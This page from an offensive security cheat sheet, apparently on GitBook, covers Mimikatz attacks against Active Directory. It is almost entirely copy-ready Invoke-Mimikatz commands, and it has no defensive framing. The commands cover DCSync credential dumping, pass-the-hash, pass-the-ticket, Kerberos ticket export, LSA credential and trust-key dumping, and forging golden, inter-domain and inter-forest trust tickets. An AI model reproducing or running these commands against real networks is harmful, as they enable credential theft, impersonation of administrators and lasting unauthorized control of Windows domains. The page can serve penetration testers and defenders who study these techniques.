🕺
🕺
🕺
🕺
CheatSheets
Search…
Introduction
Getting Started With Hacking
VMs on Mac
Windows
Enumeration
Local Privilege Escalation
UAC Bypasses
Persistance
Networking
Active Directory
Offensive Powershell
Enumeration
Lateral Movement
Escalation
Persistance
Mimikatz
Alternate Cred Dumps
MSSQL
Defences and Bypasses
Setting Up a Lab
Red Teaming
Phishing Payloads
Cobalt Strike
Metasploit
Linux
Networking
Enumeration
Local Privilege Escalation
Persistance
MySQL
Mainframes
HP Nonstop
IBM z/OS
Cloud
AWS
GCP
Azure
Web App
Tomcat
SQLMap
PHP
Mobile
Android
iOS
Exploit-Dev
Linux
Shellcode
Windows
WiFi
Alfa AWUS036ACH Setup
Aircrack-ng
Powered By
GitBook
Mimikatz
DCSync
1
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\USER"'
2
​
3
Invoke-Mimikatz -Command '"lsadump::dcsync /all"'
4
​
5
# When DCsyncing and other actions you need to know the short hand of the domain.
6
# This can be found with Translate-Canonical
7
https://gist.github.com/HarmJ0y/4226349db644e6549605
Copied!
Pass-The-Ticket
1
Invoke-Mimikatz -Command '"kerberos::ptt TGS_ticket_file.kirbi"'
Copied!
Pass-The-Hash
1
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:DOMAIN.local /ntlm:<ntlmhash> /run:powershell.exe"'
Copied!
Extract Tickets
1
Invoke-Mimikatz -Command '"kerberos::list /export"'
Copied!
Dump Local Creds
1
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Copied!
Extract Trust Keys
1
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc
Copied!
Forge Golden Ticket
1
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:HASH id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
Copied!
Forge Inter-Domain Trust Ticket
1
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-15-21-280534878-1496970234-700767426-519 /rc4:HASH /service:krbtgt /target:TARGETDOMAIN.local /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'
Copied!
Forge Inter-Forest Trust Ticket
1
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:HASH /service:krbtgt /target:TARGETFOREST.local /ticket:C:\AD\Tools\kekeo_old\trust_forest_tkt.kirbi"'
Copied!
Active Directory - Previous
Persistance
Next - Active Directory
Alternate Cred Dumps
Last modified
1yr ago
Copy link
Contents
DCSync
Pass-The-Ticket
Pass-The-Hash
Extract Tickets
Dump Local Creds
Extract Trust Keys
Forge Golden Ticket
Forge Inter-Domain Trust Ticket
Forge Inter-Forest Trust Ticket